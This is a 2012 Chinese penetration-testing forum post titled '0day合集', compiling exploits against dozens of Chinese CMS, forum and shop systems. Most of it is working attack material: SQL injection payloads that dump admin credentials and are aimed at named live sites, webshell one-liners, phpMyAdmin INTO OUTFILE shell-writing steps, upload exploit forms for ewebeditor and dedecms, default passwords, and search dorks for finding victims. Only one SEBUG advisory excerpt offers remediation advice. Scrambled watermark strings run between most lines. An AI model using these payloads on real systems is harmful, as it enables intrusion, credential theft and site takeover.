中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
) a7 V/ g0 {* h) w. F# T
^# D; q0 G' i) G& i
直接上exploit:
L. `" w0 f4 y. u
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
; i5 R1 ~; [5 N8 D; N% M3 I
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
. d# L6 F6 A, }4 l! y$ B/ }
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 | k3 P' d- l1 F3 b
Asprain论坛 注册用户 上传图片就可拿到webshell
2 G* i$ P& P' Z- Y- U
X7 H: v& Y6 N) M
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
' x7 b8 b& l( m0 v6 e4 U
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
- a& ?0 S$ S$ f2 I4 z# B2 K
2.gif 为一小图片文件,一定要小,比如qq表情图片
! D3 a1 D+ J) r' O$ C8 ]
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
. h5 t! j$ ]$ V5 `, \; m4 W
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
$ {; q/ E' W- H3 F: W8 h
5.q.asp;.gif
: A% |" T, m! S) y! J
google:Powered by Asprain
! ?# ? x: i7 C; |) B8 z% ]3 N% \
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- K# Z% G; G% M
( u+ Y/ M4 h, G4 h+ ]- o" h
ShopNum1全部系统存在上传漏洞。
4 c( D; t/ x( x1 S3 Y5 u! d( d
" \0 P& L4 @/ P9 _8 v. a5 n
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
& I' z) r$ P' o8 H! o9 o5 f5 r
按说明 提示登录后台。。
# ?8 e' B% |' F* F% f
在后台功能页面->附件管理->附件列表
4 J' w5 I g5 P1 U' e
可以直接上传.aspx 后缀木马
! B' o, E) l9 }& r' n8 [/ E
http://demo.shopnum1.com/upload/20110720083822500.aspx
& l( T# l8 E+ @& r. @# N# Z6 X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ x( X+ P7 k+ d8 s
, r+ v0 \, f2 R A9 o* I+ ^, o6 e
牛牛CMS中小企业网站管理系统 上传漏洞
3 K1 a( _" i; ]1 R0 K5 L$ J
5 P4 r* m; d" I# {( y
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
, E! F E0 i# r7 N, X; g" g
后台:admin/login.asp
, c s k+ O" \& k" u/ k! T
ewebeditor 5.5 Nday
$ E0 A+ Z+ u' `" r# N1 }" d
exp:
% z7 \- g# s j8 I' q% u3 V# F, u) F6 P
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
0 H, `# p0 N9 R' ^& h. h
<input?type=file?name=uploadfile?size=100><br><br>?
, G% k% A5 N, f$ k9 I% \
<input?type=submit?value=upload>?
( h) N1 L C# W ?0 k/ }' E
</form>
5 I2 _$ F" n2 F
ps:先上传小马.
! h* w# x" e- H. F4 k. m% U; H1 g4 w
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
3 E- o' Q8 H$ e, w# D% z( w
8 Z: {5 W4 l' L1 D! }
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% G2 b% v. t" s- C; `) C7 c
8 F) H, d8 ~& m5 o2 }3 d
YothCMS 遍历目录漏洞
; p9 T! P. A0 X: n4 [" u K3 |
6 H5 R; ? d# M0 \( C4 `% n
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
4 G0 q C# w% @3 c! Q/ a
默认后台:admin/login.asp
8 l: Z: ^- U1 V4 s+ s" z
遍历目录:
% \% H5 y: ~, ^6 p: J/ ~: E
ewebeditor/manage/upload.asp?id=1&dir=../
* ^7 B, O9 ? a; N# T' W
data:
- S0 D! L" p1 D6 B( y
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
1 j( Q8 ^ `9 k+ k* J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" u: J! t/ ~# [" {" E
$ N; D7 C- v! C; o
Net112企业建站系统 1.0
* x2 v' W% a, ?% E+ @* E
8 W1 l4 j0 t( u! |# |+ Q
源码简介:
8 k8 T+ U) h+ ?1 C
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
1 X+ F( i& {6 P0 a# l9 C: u% J
添加管理员:
/ D, H3 T; m$ L8 m# z! w2 Q
http://www.0855.tv/admin/admin.asp?action=add&level=2
4 E1 X- x' w* a$ O4 ]+ G3 u, C
其实加不加都不是很重要,后台文件都没怎么作验证。
; [$ R/ l: c. C# d
上传路径:
; X2 m" H# F5 s g
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
4 }5 k( V5 _, X7 j% t# t. J4 y
http://www.0855.tv/inc/Upfile.asp?Stype=2
( L/ h# _; |$ I7 k1 c5 e+ H
怎么利用自己研究。
9 D3 l9 a. j& X) R1 w
遍历目录:
! o9 D& s# [: V+ z. M0 ]" z- R
http://www.0855.tv/admin/upfile.asp?path=../..
; D; |. a" @9 Q, {
如:
& B2 F- s4 q; c
http://www.0855.tv/admin/upfile.asp?path=../admin
$ }+ }' b& B% l! j y: I4 q
http://www.0855.tv/admin/upfile.asp?path=../data
( v# b+ V+ c" M3 J; A: X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 @1 V! h& c& D! a/ e
. \ n, {9 n4 T, u8 V& a* b9 b
易和阳光购物商城通杀 上传漏洞
8 P! u; R# f: D* p6 _& o
5 g! w0 Q7 N0 G9 K+ w& O( o% \
前提要求是IIS6.0+asp坏境。
: h6 Y8 X$ I, \0 o1 l
漏洞文件Iheeo_upfile.asp
4 h4 c6 K F: H$ @' p
过滤不严.直接可以iis6.0上传
. d: |; }4 B* W u; S5 M% Y x
把ASP木马改成0855.asp;1.gif
2 V$ j9 m! Q3 J! _3 e7 E2 r5 @/ |1 f
直接放到明小子上传
. [+ @+ y" {# l5 ]
Google搜索:inurl:product.asp?Iheeoid=
" K& v# {4 K: N; X4 l& J6 J% [
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' L& l4 I7 L5 Z) Y
8 J! N6 s0 ~2 D/ t6 H' w
phpmyadmin后台4种拿shell方法
( M& u( k4 o/ c: g
7 I, k/ v" |: M/ s, D8 M/ S
方法一:
5 G) W9 @7 F) h" [
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
( X5 t( M$ V+ V6 i3 q
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
) f& i' {% d! a4 V
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! \9 D7 m7 e7 h) d1 x& G
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
5 O: w7 {: H6 s7 C
一句话连接密码:xiaoma
$ F( E Y4 z( T, R$ N' b1 K
方法二:
$ f9 l6 f' w3 H- ^$ R' D# K+ m# D
Create TABLE xiaoma (xiaoma1 text NOT NULL);
$ h. @: h7 _$ E/ M0 z
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
# l0 A: J) H6 ^7 s: {
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
( @, o0 r& _8 C2 H( Z: }( T* S
Drop TABLE IF EXISTS xiaoma;
6 q4 Z6 ]2 K) ~
方法三:
$ g! B+ t& K, W6 v
读取文件内容: select load_file('E:/xamp/www/s.php');
; K: a9 D0 f# [5 D* k
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
1 e- y8 _: e2 v! [* x
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
4 |" T- O& R$ _% r" b
方法四:
. D3 K! Y% i7 u. f, I1 S1 N. J
select load_file('E:/xamp/www/xiaoma.php');
0 _" T+ U: @$ _- P, Y# z
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 B6 `9 Q) s6 a9 H
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
! d4 i/ K! R' G5 [' D" S& v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 s- t1 ^+ u0 l8 H7 ^" M2 U
6 A- S5 U+ k, {/ _8 j) D- l6 N0 }. j
传信网络独立开发网站源码0day漏洞
/ s& ~1 }- K0 S5 k) X+ q% c9 h+ d
$ _* @) o! b" G. j% A
后台system/login.asp
7 _% ]5 E4 T3 K
进了后台有个ewebeditor
. \, ^ ]2 ?! t* P6 n; A! f& a" W
Google 搜索inurl:product1.asp?tyc=
9 z W* B6 Z$ a0 F u
编辑器漏洞默认后台ubbcode/admin_login.asp
; i% i; M" z( q5 {8 k
数据库ubbcode/db/ewebeditor.mdb
: u5 J4 q1 _# Z& X8 I3 r' @4 u
默认账号密码yzm 111111
, g a% k1 I" L/ l5 l0 m* L7 H' I" [
4 A6 e. D, {2 [5 }
拿webshell方法
! y1 w1 [( E1 p5 z" w
登陆后台点击“样式管理”-选择新增样式
+ e) u/ S7 ~, o% ^. V+ ^
样式名称:scriptkiddies 随便写
' N9 B4 H0 l% J, E+ l8 p
路径模式:选择绝对路径
' a( I/ c: n/ n
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
, \% A0 [" d- O$ v. \
图片类型比如就是我们要上传的ASP木马格式
. k6 k' Z! N- p4 h+ v: T" F
上传路径:/
: \- S( f% h* k6 x! u, U
图片限制:写上1000 免的上不了我们的asp木马
* v9 X# I b7 G5 i, n) x
上传内容不要写
6 N5 [/ Y6 b! U4 k
可以提交了
( h f d# y# P7 e8 o* ?" \
样式增加成功!
2 o; G: |7 V; \/ O) ~
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
: @: J: w" w! v1 H
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
6 K1 c$ v$ ^0 l/ H! V7 V
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
% J7 Y6 U$ q t0 P B8 e: H0 q9 D R
上ASP木马 回车 等到路径
2 v+ v. O& g! Z8 E
- y- F: U( ^, t! P& j
后台:system/login.asp
; q4 S7 J: m$ r& t# p$ s
Exp:
1 I/ M. R; ?1 f8 O$ P7 Z- g
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
: V4 g4 h5 ^: @8 ~8 S% ~
测试:
& L- \ {' b& C6 }4 Z; O
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 f+ J: c. v/ R2 R: E
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
5 Y& T' M: C. q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; r8 F" [7 t% b# |" q9 r
1 u8 h b, K" H( P+ ^2 ^2 o5 S
foosun 0day 最新注入漏洞
( u- E$ t, ^' S) M0 J8 _: L1 _$ n
9 T5 S/ w$ k3 W1 w, \
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
1 R5 |. i; N# s- @% H5 r6 P9 G1 Y, C1 N% F
利用简单的方法:
" [* v6 S- j3 S5 a3 d1 m! K& r
暴管理员帐号:
! D$ i6 \/ W2 J7 C# Y1 H- Q
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
' I. U& d2 z+ ?2 m( |% s" n
暴管理员密码:
% J7 G4 V9 m6 n/ L }9 d
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
9 F" Q+ y* V: _! I. t0 i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" m/ k" p7 W) v0 K2 x
7 f2 L) Y- M8 e p
网站程序的版权未知!
* d5 `# @6 h1 P7 m9 V) G4 a4 Y4 \
& @: b9 y1 X) A0 f4 ^) g) b
默认网站数据库:
8 L2 M3 d9 s- f. @) N, l7 |) \9 N
www.i0day.com/data/nxnews.mdb
$ K' S |" x: Z0 n" ?/ d+ b0 `
ewebeditor 在线编辑器:
6 i/ b0 p# m* D( o3 P! {
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
. q2 @4 h: ^+ u$ l* Y& E; p6 V, v0 f
登录地址:ewebeditor/admin_login.asp
2 P/ U$ h7 M# Q; u7 I* i
默认密码:admin admin
D5 j% j4 ^7 n3 Q
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
* q0 L! j, o, U. `. Q3 Y9 \$ P
! s* O3 W6 D' ~. l7 ^: C
Sql注入漏洞:
( r& o7 ]# a3 v; ]" T/ t
http://www.i0day.com/detail.asp?id=12
) r& s k) m3 T) i, b* l& S
exp:
, W& Q/ p3 O5 p- j0 K
union select 1,admin,password,4,5,6,7,8 from admin
! d. v" ], U1 H: B7 @5 z5 [) f
爆出明文帐号/密码
@8 J0 K6 z+ Z& c
( `* ~* [: y/ E7 b& u' \( \
上传漏洞:
5 ]2 v" Q' D7 O
后台+upfile.asp
* f c6 e2 |2 S4 z3 h m1 `+ @- y
如:
7 C$ e! h- K, q p6 s/ b
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
% q: f( F6 V2 d: l/ D6 ]. D& m, x
shell的地址:网址+后台+成功上传的马
" J( b( F2 d' b+ T: Q
google:inurl:news.asp?lanmuName=
- o! I9 h3 C/ a! E9 u3 f. @
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! K: H, R$ m+ J+ Q
8 w: `+ n, ]1 C6 E1 ]: F) s" m
dedecms最新0day利用不进后台直接拿WEBSHELL
' T1 N! D" s( o) _3 p
+ S; l& z+ W" p& i
拿webshell的方法如下:
7 K; {9 R# m2 m" P! y1 t
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
8 I: b, w. j0 y# u g
前题条件,必须准备好自己的dede数据库,然后插入数据:
# W) v4 S5 w3 @/ W
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
+ u% C, c% }' n9 ~
* Y, u* L! `; A% o% h- e
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
& l$ [5 a9 J9 @" S& J9 o3 C+ \
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
* @3 [7 Y, t% _, Y) t
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
! b7 K1 S! U, d; ^$ u2 W( K6 T
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
l9 a, q( e' Z0 q) G! b4 D. `; j0 Y
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
* k3 W! f% {& @- w9 J
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
. K) ]7 I& R3 i1 ~
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
7 t$ c+ q8 ~: T8 ?
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
: @' _# m) v0 t8 Z* S: L* p
<input type="text" value="true" name="nocache" style="width:400">
3 i7 X: ^2 q3 P5 }
<input type="submit" value="提交" name="QuickSearchBtn"><br />
3 W/ r+ X' G0 s/ W
</form>
7 r3 p/ T( W- z, a/ }
<script>
4 P ?$ Q7 k( T" x
function addaction()
0 O/ h4 J% c: H" W
{
' \, j+ D4 ?! U. u6 }
document.QuickSearch.action=document.QuickSearch.doaction.value;
1 y; j- M8 N/ D- ~) G$ b- x6 Z# v6 f1 R1 B
}
1 R+ ~. G5 q$ E1 W3 o
</script>
. z( }) V( K5 N0 S) j' |( c, n
-----------------------------------------------------------------------------------------------------------------------------------------------
9 H3 m4 `$ M( m. l1 V, I+ W7 y0 F8 z, q; g
& p2 k' G7 R) @9 w
dedecms织梦暴最新严重0day漏洞
) I7 x- F2 z: e5 m' ^
bug被利用步骤如下:
, E' g: J& h V5 k( f
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
. X4 x s0 A- [+ Z
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
8 ]6 w0 i$ c8 p A8 W
-------------------------------------------------------------------------------------------------------------------------------------------
3 K- j0 B6 w' W) Z. X3 h" s9 k Q
& h0 T5 j1 v: l3 {: C) w
多多淘宝客程序上传漏洞
@" }+ ? P2 p1 M+ ^3 x
漏洞页面:
3 k2 L3 V3 X* P v4 R- l
admin\upload_pic.php
2 b8 q y0 S$ L6 I& ?$ t
传送门:
2 d! Y( _0 _6 J, i
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
- C" K$ d4 p g
PS:copy张图片马 直接 xxx.php 上传抓包地址!
- `( E& {3 C) C
------------------------------------------------------------------------------------------------------------------------------------------------------
! m0 |+ J( |6 L6 w# x$ ~9 H
, k" R. S/ @( t! c1 l
无忧公司系统ASP专业版后台上传漏洞
( h( l% L& M* v( P% u( N( n
漏洞文件 后台上传
" m' t1 \8 C) V
admin/uploadPic.asp
3 V, ~, ^! g$ x/ V7 M( C
漏洞利用 这个漏洞好像是雷池的
9 Q. n* p2 c; r. r' g/ D, n
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
* j: C# o0 K$ v% l& g
等到的webshell路径:
: I6 D5 _' t# ]" H8 ]6 U9 [- T
/UploadFiles/scriptkiddies.asp;_2.gif
1 o, u6 C# c3 w5 a0 ?4 y+ ^# n9 O
---------------------------------------------------------------------------------------------------------------------------------------------------
- z3 t2 {; i. v6 f# b
& \6 r! K' _5 i# [! g, ~
住哪酒店分销联盟系统2010
& `, V" w5 L' k: |1 m7 A' f0 l
Search:
: V5 U4 a, i7 B
inurl:index.php?m=hotelinfo
$ ^; l+ j7 ]: E5 D& E8 L
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
' N V9 i. J6 N
默认后台:index.php?m=admin/login
: S$ F& h/ a X$ a; f9 s/ E
--------------------------------------------------------------------------------------------------------------------------------------------------
. J: J4 A# o) H3 E* P9 r
* C6 m9 u$ f% y: s/ [; l0 D
inurl:info_Print.asp?ArticleID=
' a6 B* j9 u% | R% O1 N/ A
后台 ad_login.asp
; X4 B8 }% v5 E( ^
爆管理员密码:
0 d" U$ f: \. z( d) N+ u" B
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
, ]1 d, f: G0 A# O+ @8 S0 B
------------------------------------------------------------------------------------------------------------------------------------------------------------
# i' S1 E; d4 H9 a1 I" a: r
, Y9 G# ~% \$ B0 y% q9 l' s( L' D C
搜索框漏洞!
* R4 V$ J, n) S- h
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
- O3 k3 O) g4 y% w6 R7 _" m
--------------------------------------------------------------------------------------------------------------------------------------------------------
0 H4 \7 d) T# w4 n
+ u4 J0 k- `% A2 q8 x; D3 n
关键字:
* y6 w3 m) ?5 E# F2 S, O) W; x5 K
inurl:/reg_TemletSel.asp?step=2
' I$ w! B5 S8 [+ v% N8 s1 h/ ~
或者
- O* B$ O5 M" L, m
电子商务自助建站--您理想的助手
# m" q6 h. v! e$ }0 J
-------------------------------------------------------------------------------------------------------------------------------------------------
( i& T) C( {9 s! h# [! X
0 Y( `) p/ T: ^+ M c. M8 V5 x
iGiveTest 2.1.0注入漏洞
6 Z2 J- }2 [5 i: D& [. _
Version: <= 2.1.0
* y3 l) g' s2 R+ y& l8 L0 w& ~# B6 T
# Homepage:
http://iGiveTest.com/
3 W6 ?2 V- f# n( Q+ p# ?' G" A1 _) `
谷歌关键字: “Powered by iGiveTest”
. Z# Q, L8 r# z. {% V) m$ P
随便注册一个帐号。然后暴管理员帐号和密码
6 B0 x9 Y, g7 |0 b; Q+ Z+ s% V! E& ], z
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
) W" _8 b! t- H. W: s1 a% ?
------------------------------------------------------------------------------------------------------------------------------------------------
1 W `' @% Q' I; p `
7 K5 n6 R3 I2 f/ C |, ^
CKXP网上书店注入漏洞
6 B6 a* {7 i$ x" B% l4 q
工具加表:shop_admin 加字段:admin
# g2 I& B# s# I7 s
后台:admin/login.asp
( m+ V4 o' ~* G3 C& ?6 y' z
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
e- L6 Y) J: b$ i
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
, p! l+ `# P3 s) }3 m) |% E; ?" k8 z, _
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: }8 `- M$ G6 `) n V
$ H, [4 u5 n2 B' ?
段富超个人网站系统留言本写马漏洞
9 R& O7 T0 t9 g) i* F' _6 i0 c
源码下载:
http://www.mycodes.net/24/2149.htm
3 Z' `/ c( @# o$ r
addgbook.asp 提交一句话。
6 s' f E* T9 q2 I' E! I! V
连接:
http://www.xxxx.tv/date/date3f.asp
6 v) j% h* Q8 B' O' I( ~
google:为防批量,特略!
0 ^( g( L! O! a! e
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# a8 x3 w; X( k6 R0 F7 H
- A1 M9 k0 V5 s/ P
智有道专业旅游系统v1.0 注入及列目录漏洞
0 a8 f; G1 ^& E2 ]" p
默认后台路径:/admin/login.asp
5 H) b/ j; J" `5 c, H
默认管理员:admin
! C/ {1 f. `7 f/ A
默认密码:123456
# c6 y/ q q9 z: N
SQL EXP Tset:
$ r; b- e2 P. E3 B: r `9 b3 c+ L" p5 ~
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
$ }& x$ ^1 R# s( ]% g& L
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# y8 }- O" |1 J
# {* g% M# j) Y, \7 c7 x
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
1 I2 U- s# l+ j1 p& m( }0 j
EXP:
, }: V/ D2 Q5 l$ D9 S
<title>eWebeditoR3.8 for php任意文件上EXP</title>
1 b! V+ P' G8 F3 X* w |+ I
<form action="" method=post enctype="multip
8 C' i* F, t0 K* H' I
art/form-data">
2 B+ ?3 I" X6 _% C* n
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
- ~; y' Q& r m- ]# }
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
& N# N/ c0 D; O& N
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
9 @; J# S1 V: G9 F/ a% R$ _- g- Z
file:<input type=file name="uploadfile"><br>
! k$ B9 |4 M0 U0 E4 |& \
<input type=button value=submit onclick=fsubmit()>
) V$ {+ m7 Z M
</form><br>
& p% O7 L" Y$ u% g% m9 k% E
<script>
3 p/ C+ H) d5 @0 b& F0 W
function fsubmit(){
0 U6 K: j2 ^5 i+ n- o$ u; W
form = document.forms[0];
D4 k' s. A& x% C# t- J P9 ?
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
1 {* s; h/ x |2 \ ]
alert(form.action);
; V5 n+ w: D9 F& Q, Z. L k
form.submit();
! B' T$ d; L$ w3 Y" K
}
4 q3 U( t F' X5 o2 p& q
</script>
6 @+ [1 f+ a* X& D
注意修改里面ewebeditor的名称还有路径。
. i+ H) E* A6 _/ i. B$ a8 z
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 _" B8 \' t1 P# d* ?+ ^+ }
6 K- ^: E' v: A6 p+ F/ _: |: c- M
提交’时提示ip被记录 防注入系统的利用
8 u+ y% z `& E. }, f! H
网址:
http://www.xxx.com/newslist.asp?id=122
′
# }& [5 u9 z0 m' C6 F9 ]; g9 c
提示“你的操作已被记录!”等信息。
2 C3 O" ^0 I$ \9 S
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
7 p" @/ X$ ~5 t% B5 ?: m, h
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: r: n& n! X% O- Q0 ?
: t. ^; \7 x5 Y4 ]# }0 E7 s
西部商务网站管理系统 批量拿shell-0day
+ U+ _& r. x! a$ A4 `& `4 I
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
( z' ?) S9 B+ J% ]
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
y, k+ f: f2 U; S- @. ?7 s/ v
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
7 t: z/ T2 j, f' G0 a6 M2 y
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
5 K! M; c% q7 B, D+ @3 _6 _ S
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 I" I& A; l3 c6 ]3 q5 Y! V2 w
( Y1 Z0 x- N3 ]5 S) R( w' I- E
JspRun!6.0 论坛管理后台注入漏洞
1 z% }" a2 w G
* M8 z7 w; y; H5 x& t" c5 l
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
S7 |, Y+ |$ H; O3 p$ T
JspRun!6.0
. _4 ^1 P2 a# b( Z& x- N0 [
漏洞描述:
/ B# L+ L7 R5 q1 m1 h* {
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
e3 D% [$ ?* F" z: u
在处理后台提交的文件中ForumManageAction.java第1940行
9 |! o1 ~: `, `0 D! ~ z
String export = request.getParameter("export");//直接获取,没有安全过滤
7 \5 Y2 G0 o2 t* r% t/ B
if(export!=null){
( Z+ O- m; I' j7 u$ b# [+ e
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
0 v; L D! \, M0 M( r
if(styles==null||styles.size()==0){
) V$ T) A* ?4 h& S/ ~
<*参考
; |; e( b; ^- ^, b7 R9 M5 F* M
nuanfan@gmail.com
7 G) b6 D( Z: Q. O2 Q4 I1 K& _
*> SEBUG安全建议:
- m8 B% R( k& j$ V U# n+ W
www.jsprun.net
8 q# i- V2 ^8 a$ }% s& M+ L& o) N
(1)安全过滤变量export
4 T# x4 N* O6 y& X$ L
(2)在查询语句中使用占位符
, Y( h! [4 A. O
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 g. k. [0 ~) ?/ F
! j+ ^6 {% w* Q8 E$ E0 s
乌邦图企业网站系统 cookies 注入
) a/ E* b8 b' X0 e8 Y @
" P- k: u) n$ o
程序完整登陆后台:/admin/login.asp
, R% H t* j3 c: i
默认登陆帐号:admin 密码:admin888
7 J; ^' k1 w7 |3 X! `- P) F
语句:(前面加个空格)
3 y( g% M( S( D1 I9 u
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
) e f5 x& W2 }2 P' D& b
或者是16个字段:
7 f5 z) Q7 J* W; e# u! Q
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
/ b; q2 f* L: S8 D. E/ f# R. K5 b& L. B
爆不出来自己猜字段。
, W3 }5 d' U& p, }3 |
注入点:
http://www.untnt.com/shownews.asp?=88
' [3 k% g8 d+ P# i2 p0 C4 k+ X
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
' t: a# {) @1 {, w2 b- Y; E5 C
关键字:
8 G8 n3 _+ i# j( ]" a
inurl:shownews?asp.id=
6 M/ I& q4 t* B- v
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
m9 q# ^4 S7 O- g8 |; S
